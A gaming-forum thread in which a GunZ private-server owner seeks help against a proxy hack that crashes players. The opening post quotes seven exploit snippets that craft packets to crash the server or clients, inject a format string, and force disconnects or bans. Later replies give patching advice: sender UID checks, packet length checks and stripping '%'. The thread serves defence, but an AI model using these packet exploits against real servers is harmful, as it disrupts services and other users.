Hack 1.5 Crash Players. HELP!

Results 1 to 7 of 7
  1. #1
    Proficient Member Mourplus is offline
    MemberRank
    Feb 2013 Join Date
    151Posts

    Hack 1.5 Crash Players. HELP!

    In my gunz server in version 1.5, is running a hacker who was posted in:

    Release GunZ Hack Proxy for AeriaGames (USA) & GunZ Ultra (PERU). - Page 5

    and are closing the game of my players, somebody help me please?


    Re: GunZ Hack Proxy is AeriaGames (USA) & Ultra GunZ (PERU).

    * Note: Until your post count is 15 you will be able to send PMs to Staff only. *

    Uh ...
    nothing to write.

    Here's some exploitable commands:
    1. MC_NET_CLEAR - Crash the server.
    Code:

    PHP Code:
        MCmdWriter Cmd;
        
    Cmd.WriteMUID (uidTarget) / / Some existing player's UID.
        Cmd.Finalize (MC_NET_CLEAR, MCFT_END);
        SendToServer (& cmd); 
    2. MC_NET_ECHO - Send echo message to peer.
    Code:

    PHP Code:
     MCmdWriter Cmd;
        
    Cmd.WriteString ("^ 2Hello world.") / / Message to send.
        
    Cmd.Finalize (MC_NET_ECHOMCFT_END);
        
    SendToPeer (& cmd);
        
    SendToClient (& cmd); 
    3. MC_MATCH_LOGIN_FROM_DBAGENT_FAILED - Disconnect player from the server.
    Code:

    PHP Code:
    MCmdWriter Cmd;
        
    Cmd.WriteMUID (uidTarget) / / Target UID you want to disconnect.
        
    Cmd.WriteInt (90002) / / Message ID to show.
        
    Cmd.Finalize (MC_MATCH_LOGIN_FROM_DBAGENT_FAILEDMCFT_END);
        
    SendToServer (& cmd); 
    4. MC_PEER_BUFF_INFO - Crash the player with Full CPU usage.
    Code:

    PHP Code:
    MCmdWriter Cmd;
        
    Cmd.WriteInt (sizeof (int) * 2) / / Blob size.
        
    Cmd.WriteInt (0) / / Blob each array element size.
        
    Cmd.WriteInt (INT_MAX) / / loop 2147483647 times.
        
    Cmd.Finalize (MC_PEER_BUFF_INFOMCFT_END);
        
    SendToPeer (& cmd); 
    5. MC_MATCH_REGISTERAGENT - Crash the server.
    Code:

    PHP Code:
     MCmdWriter Cmd;
        
    Cmd.WriteString ("% s% s"), / / ​​invalid string.
        
    Cmd.WriteInt (0) / / port.
        
    Cmd.WriteInt (0) / / UDP port.
        
    Cmd.Finalize (MC_MATCH_REGISTERAGENTMCFT_END);
        
    SendToServer (& cmd); 
    6. MC_NET_BANPLAYER_FLOODING - Disconnect player from the server.
    Code:

    PHP Code:
    MCmdWriter Cmd;
        
    Cmd.WriteMUID (uidTarget) / / Target UID you want to disconnect.
        
    Cmd.Finalize (MC_NET_BANPLAYER_FLOODINGMCFT_END);
        
    SendToServer (& cmd); 
    7. MC_MATCH_DUELTOURNAMENT_REQUEST_JOINGAME - Send player to the Duel Tournament.
    Code:

    PHP Code:
    MCmdWriter Cmd;
        
    Cmd.WriteMUID (uidTarget) / / Target UID you want to kick out.
        
    Cmd.Finalize (MC_MATCH_DUELTOURNAMENT_REQUEST_JOINGAMEMCFT_END);
        
    SendToServer (& cmd); 


  2. #2
    Proficient Member Mourplus is offline
    MemberRank
    Feb 2013 Join Date
    151Posts

    Re: Hack 1.5 Crash Players. HELP!

    Help me patch gunzproxy.exe ? ;\

  3. #3
    Fuck Army. sahar042 is offline
    MemberRank
    Jul 2009 Join Date
    833Posts

    Re: Hack 1.5 Crash Players. HELP!

    Hmm i didn't patched it yet but i am going to patch it soon on my server, For now you can try to change packet encryption on the source...
    But if the "Hacker" that using hacks on your server with gunzproxy know how to find packet encryption via memory than it's useless but you can give it a try i guess...

  4. #4
    Proficient Member Mourplus is offline
    MemberRank
    Feb 2013 Join Date
    151Posts

    Re: Hack 1.5 Crash Players. HELP!

    I have an idea '-'

  5. #5
    Wait wut PenguinGuy is offline
    MemberRank
    Apr 2010 Join Date
    United StatesLocation
    765Posts

    Re: Hack 1.5 Crash Players. HELP!

    On ZGameClient_OnCommand.cpp, check the UID of the sender. If it's coming from another client, don't allow.
    However, note that I don't remember what packet does what anymore.
    Edit-- May be another source file that handles MC_NET_CLEAR and alike.

    MC_NET_CLEAR
    MC_MATCH_LOGIN_FROM_DBAGENT_FAILED
    MC_NET_BANPLAYER_FLOODING
    MC_MATCH_DUELTOURNAMENT_REQUEST_JOINGAME
    ^ Shouldn't be allowed by other players.

    MC_PEER_BUFF_INFO
    ^ Check the length of the packet.

    MC_MATCH_REGISTERAGENT
    ^ Either kill "%" acceptance for your server, or query it out of the string.

  6. #6
    Fuck Army. sahar042 is offline
    MemberRank
    Jul 2009 Join Date
    833Posts

    Re: Hack 1.5 Crash Players. HELP!

    Quote Originally Posted by PenguinGuy View Post
    On ZGameClient_OnCommand.cpp, check the UID of the sender. If it's coming from another client, don't allow.
    However, note that I don't remember what packet does what anymore.
    Edit-- May be another source file that handles MC_NET_CLEAR and alike.

    MC_NET_CLEAR
    MC_MATCH_LOGIN_FROM_DBAGENT_FAILED
    MC_NET_BANPLAYER_FLOODING
    MC_MATCH_DUELTOURNAMENT_REQUEST_JOINGAME
    ^ Shouldn't be allowed by other players.

    MC_PEER_BUFF_INFO
    ^ Check the length of the packet.

    MC_MATCH_REGISTERAGENT
    ^ Either kill "%" acceptance for your server, or query it out of the string.
    Thank you.

  7. #7
    Praise the Sun! Solaire is offline
    MemberRank
    Dec 2007 Join Date
    Undead BurgLocation
    2,862Posts

    Re: Hack 1.5 Crash Players. HELP!

    I'll release a patch in a bit.



Advertisement